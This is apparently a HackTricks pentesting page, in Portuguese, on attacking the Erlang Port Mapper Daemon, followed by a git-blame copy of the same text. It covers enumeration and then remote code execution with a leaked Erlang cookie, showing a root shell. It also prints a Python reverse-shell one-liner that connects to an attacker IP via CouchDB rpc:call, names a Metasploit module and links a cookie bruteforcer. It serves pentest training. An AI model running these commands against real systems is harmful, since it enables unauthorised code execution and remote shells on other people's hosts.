hacktricks/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md

# Informações Básicas

O daemon do mapeador de porta Erlang é usado para coordenar instâncias Erlang distribuídas. Seu trabalho é **manter o controle de qual nome de nó escuta em qual endereço**. Portanto, o epmd mapeia nomes simbólicos de nó para endereços de máquina.

**Porta padrão**: 4369
```
PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
```
Isso é usado por padrão em instalações do RabbitMQ e CouchDB.

# Enumeração

## Manual
```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369

#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
```
## Automático
```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>

PORT     STATE SERVICE VERSION
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|     bigcouch: 11502
|     freeswitch: 8031
|     ecallmgr: 11501
|     kazoo_apps: 11500
|_    kazoo-rabbitmq: 25672
```
# Erlang Cookie RCE

## Conexão Remota

Se você conseguir **vazar o cookie de autenticação**, será capaz de executar código no host. Geralmente, esse cookie está localizado em `~/.erlang.cookie` e é gerado pelo Erlang na primeira inicialização. Se não for modificado ou definido manualmente, é uma string aleatória \[A:Z] com um comprimento de 20 caracteres.
```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]

Eshell V8.1 (abort with ^G)

At last, we can start an erlang shell on the remote system.

(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
Mais informações em [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
O autor também compartilha um programa para forçar a senha do cookie:

{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}

## Conexão Local

Neste caso, vamos abusar do CouchDB para escalar privilégios localmente:
```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE 
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```
Exemplo retirado de [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
Você pode usar a máquina **Canape HTB para praticar** como **explorar essa vulnerabilidade**.

## Metasploit
```bash
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
```
# Shodan

* `port:4369 "na porta"`


<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!

- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)

- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)

- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`# Informações Básicas`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`O daemon do mapeador de porta Erlang é usado para coordenar instâncias Erlang distribuídas. Seu trabalho é manter o controle de qual nome de nó escuta em qual endereço. Portanto, o epmd mapeia nomes simbólicos de nó para endereços de máquina.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Porta padrão: 4369`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`PORT STATE SERVICE VERSION`
			`4369/tcp open epmd Erlang Port Mapper Daemon`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Isso é usado por padrão em instalações do RabbitMQ e CouchDB.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`# Enumeração`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
fix mess 2 2022-05-01 12:49:36 +00:00			`## Manual`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`echo -n -e "\x00\x01\x6e" \| nc -vn <IP> 4369`

			`#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html`
			`dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb`
			`apt-get install erlang`
			`erl #Once Erlang is installed this will promp an erlang terminal`
			`1> net_adm:names('<HOST>'). #This will return the listen addresses`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Automático`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>`

			`PORT STATE SERVICE VERSION`
			`4369/tcp open epmd Erlang Port Mapper Daemon`
			`\| epmd-info:`
			`\| epmd_port: 4369`
			`\| nodes:`
			`\| bigcouch: 11502`
			`\| freeswitch: 8031`
			`\| ecallmgr: 11501`
			`\| kazoo_apps: 11500`
			`\|_ kazoo-rabbitmq: 25672`
			```
fix mess 2 2022-05-01 12:49:36 +00:00			`# Erlang Cookie RCE`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Conexão Remota`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Se você conseguir vazar o cookie de autenticação, será capaz de executar código no host. Geralmente, esse cookie está localizado em `~/.erlang.cookie` e é gerado pelo Erlang na primeira inicialização. Se não for modificado ou definido manualmente, é uma string aleatória \[A:Z] com um comprimento de 20 caracteres.
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn`
			`Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]`

			`Eshell V8.1 (abort with ^G)`

			`At last, we can start an erlang shell on the remote system.`

			`(test@target.fqdn)1>os:cmd("id").`
			`"uid=0(root) gid=0(root) groups=0(root)\n"`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Mais informações em [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\`
			`O autor também compartilha um programa para forçar a senha do cookie:`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% file src="../.gitbook/assets/epmd_bf-0.1.tar.bz2" %}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Conexão Local`
GitBook: [master] one page modified 2020-07-16 18:26:18 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Neste caso, vamos abusar do CouchDB para escalar privilégios localmente:`
GitBook: [master] one page modified 2020-07-16 18:26:18 +00:00			```bash
			`HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE`
			`(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).`
			`"homer\n"`
			`(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Exemplo retirado de [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\`
			`Você pode usar a máquina Canape HTB para praticar como explorar essa vulnerabilidade.`
GitBook: [master] one page modified 2020-07-16 18:26:18 +00:00
fix mess 2 2022-05-01 12:49:36 +00:00			`## Metasploit`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```bash
			`#Metasploit can also exploit this if you know the cookie`
			`msf5> use exploit/multi/misc/erlang_cookie_rce`
			```
fix mess 2 2022-05-01 12:49:36 +00:00			`# Shodan`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			* `port:4369 "na porta"`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00

			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`